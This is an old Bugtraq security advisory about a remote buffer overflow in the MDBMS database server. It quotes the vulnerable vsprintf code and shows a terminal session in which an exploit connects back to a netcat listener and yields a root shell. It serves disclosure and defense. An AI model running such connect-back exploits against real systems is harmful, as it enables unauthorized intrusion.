Remote buffer overflow in MDBMS.

Type securityvulns
Reporter Securityvulns
Modified 2001-06-14T00:00:00


Dear bugtraq readers,

MDBMS is a SQL database server (currently) for UNIX systems. Version 0.99b9 and below versions contain an exploitable buffer overflow in the handling of the \s console command.

When a user passes large buffers to the server in the form of multiple lines, these are appended to the end of each other. A subsequent call to the \s command causes the overflow.

Below is faulty code (from

void user::uprintf(char s, ...) { char b[10000]; int len=strlen(outbuf), newlen; va_list ap; va_start(ap,s); vsprintf(b,s,ap); <---- va_end(ap); newlen=strlen(b); while (newlen+len+10>=outsize) outbuf=(char)realloc(outbuf,outsize+=1000); strcat(outbuf,b); FD_SET(fd,&parent->wmask); }

mu-b also found a buffer overflow in the "create database" system. This was actually caused by a sprintf that generated the name of the management variable. This has been fixed - now table and database names can no longer be larger than 128 bytes.

Information about the overflows was sent to He has now fixed the problems, and new versions of MDBMS can be found at:

We would like to thank Marty for kind response and quick update.

Exploit example:

[teleh0r@localhost mdbms]$ ./

-- Remote code execution exploit - MDBMS <= 0.99b -- <> - Copyright (c) 2001

Usage: ./ -t <hostname> -b <back>

 -t &lt;hostname&gt;    : hostname to test
 -b &lt;back&gt;        : connect back to ip
 -p &lt;port&gt;        : port &#40;default: 2223&#41;
 -d &lt;delay&gt;       : delay before timeout
 -o &lt;offset&gt;      : offset
 -h               : return to heap

[teleh0r@localhost mdbms]$ nc -l -v -p 1337 & [1] 2070 listening on [any] 1337 ...

[teleh0r@localhost mdbms]$ ./ -t 127.1 -b localhost -h

-- Remote code execution exploit - MDBMS <= 0.99b -- <> - Copyright (c) 2001

-> Connected to: 127.1 / MDBMS V0.99b9 ready. -> Address : 0x302027d / xor-mask: 0x2020202 -> Return : 0x80cfe76 / using the heap ... -> Sending payload: ...

-> * Successfully sent payload - good luck!

connect to [] from localhost.localdomain [] 1189 [teleh0r@localhost mdbms]$ % nc -l -v -p 1337 whoami; uname -mnrsp root Linux localhost.localdomain 2.4.2-2 i686 unknown ...

Exploit code attached.

Sincerely yours, teleh0r and mu-b

-- To avoid criticism, do nothing, say nothing, be nothing. -- Elbert Hubbard